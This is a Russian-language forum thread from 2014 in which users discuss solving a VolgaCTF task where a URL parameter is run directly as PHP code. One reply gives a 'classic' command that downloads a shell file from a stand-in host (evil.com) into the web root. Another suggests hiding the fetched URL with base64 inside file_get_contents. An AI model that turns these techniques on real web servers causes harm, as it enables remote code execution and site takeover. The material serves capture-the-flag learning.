Помогите с поиском флага

markelpkr · 30 Mar 2014

Добрый день античатовцы, помогите пожалуйста найти флаг)
http://tasks.2014.volgactf.ru:28103/

fl00der · 30 Mar 2014

Какая-то ссылка подозрительная. Не пойду.

Toxa33rus · 30 Mar 2014

fl00der said:

Какая-то ссылка подозрительная. Не пойду.
Click to expand...

Там открывается вот это:
Notice: Undefined index: e in /var/www/index.php on line 3

Куда е дели? Третья строка негодует)

markelpkr · 30 Mar 2014

есть подсказка /?e=echo pi

Fepsis · 30 Mar 2014

markelpkr said:

есть подсказка /?e=echo pi
Click to expand...

e=echo pi - выводит результат функции pi()
http://www.php.su/functions/?pi

соответственно e=echo functionname выведет результат functionname()

например http://tasks.2014.volgactf.ru:28103/?e=echo+phpinfo;

На этом мои знания заканчиваются, да и не честно так ))

e17 · 30 Mar 2014

У тебя на прямую выполняется:

_ttp://tasks.2014.volgactf.ru:28103/?e=phpinfo();

классика же:
Code:
 wget -o test.php http://evil.com/sh.txt

-=Cerberus=- · 2 May 2014

или этой функцией http://www.php.net/manual/ru/function.file-get-contents.php

при необходимости урл можно закодировать в базу64 и дергать в file_get_contents через base64_decode

Помогите с поиском флага

markelpkr New Member

fl00der Moderator

Toxa33rus Member

markelpkr New Member

Fepsis Elder - Старейшина

e17 Member

-=Cerberus=- κρυπτός γράφω

Useful Searches

Помогите с поиском флага

markelpkr New Member

fl00der Moderator

Toxa33rus Member

markelpkr New Member

Fepsis Elder - Старейшина

e17 Member

-=Cerberus=- κρυπτός γράφω